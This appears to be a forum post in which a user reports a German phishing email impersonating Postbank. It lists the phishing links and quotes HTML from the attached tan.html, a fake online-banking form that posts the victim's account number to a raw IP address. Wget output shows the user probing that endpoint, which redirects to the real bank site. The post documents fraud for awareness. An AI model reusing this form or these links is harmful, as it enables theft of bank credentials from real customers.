that Firefox addon Simple Mail fetched from my remote inbox .
It is written in an almost worst German.
I get such fraud mails approx. once a week with only one or two spelling or grammar errors
with an already dead link to somewhere
http://coomar.milchs.org/KhaaPjMSgcRLYz ... IWFAc.html
and here is a (still valid) one :
http://babilon.arptoday.org/wWMrsTng/ym ... 2poVk.html
But this one has an tan.html attachment with following lines :
[ .. ]
Code: Select all
<div id="main"><div id="main-cn"><div id="nav"><div id="nav-cn">
<a href="#content" class="skip">Navigation berspringen</a>
<div id="nav-global" class="nav">
<h2 class="aux">Navigation</h2>
<ul><li class="ng-account-overview">
<a href="?wicket:bookmarkablePage=:de.postbank.ucp.application.rai.fs.kontenuebersicht.FinanzstatusPage" class="state-current">Kontenbersicht</a></li></ul></div></div></div>
<form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
<div id="content">
<div id="content-cn">
<div id="div9">
<div id="div" class="tpl-05">
<div id="div2">
<div id="div3">
<div id="div4">
<div id="div5">
<div id="div6">
<div id="content-bd">
<div class="tab-panel-bd">
<div id="id3d7">
<div class="form frm-western-union">
<div>
<div class="frm-freigeben control-step" id="id45a">
<div id="id460">
<div class="form-ft ft-legitimacy">
<fieldset>
<div class="legend"><h3>Postbank Online-Banking - Willkommen</h3></div>
<div class="legitimacy">
<div class="legitimacy-cn">
<div class="legitimacy-hd"></div>
<div id="id464">
<div class="inputBlock">
<div id="id46d">
<div class="legitimacy-bd" id="id478">
<p><strong>Bitte lesen Sie sorgfältig und füllen Sie alle Schritte in Form aufgeführt, so können wir erfolgreich überprüfen Sie Ihr Profil.</strong></p>
<div class="field fld-text fld-mobile-tan" id="id479">
<div class="field-cn" id="id492">
<div class="field-bd"> <span class="field-group"> <span class="field-label">
<label for="mobile-tan"> <b>Kontonummer:</b> </label>
</span></span></div>
[ .. ]
<wicket:container id="id46e" style="display:none"></wicket:container>
</div>
</div>
</div></div></div></div></div></div></div></div></div></div></div></div></div></form>
Code: Select all
bash-3.00# wget http://163.17.12.7/postdone.php
--16:41:26-- http://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:28-- https://postbank.de/
=> `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00# wget --no-check-certificate http://163.17.12.7/postdone.php
--16:41:50-- http://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:51-- https://postbank.de/
=> `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for postbank.de: unable to get local issuer certificate
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.postbank.de/ [following]
--16:41:53-- https://www.postbank.de/
=> `index.html'
Resolving www.postbank.de... 160.83.4.4
Connecting to www.postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for www.postbank.de: unable to get local issuer certificate
WARNING: certificate common name `postbank.de' doesn't match requested host name `www.postbank.de'.
HTTP request sent, awaiting response... 200 OK
Length: 103,127 (101K) [text/html]
100%[====================================>] 103,127 170.98K/s
16:41:54 (170.60 KB/s) - `index.html' saved [103127/103127]
bash-3.00#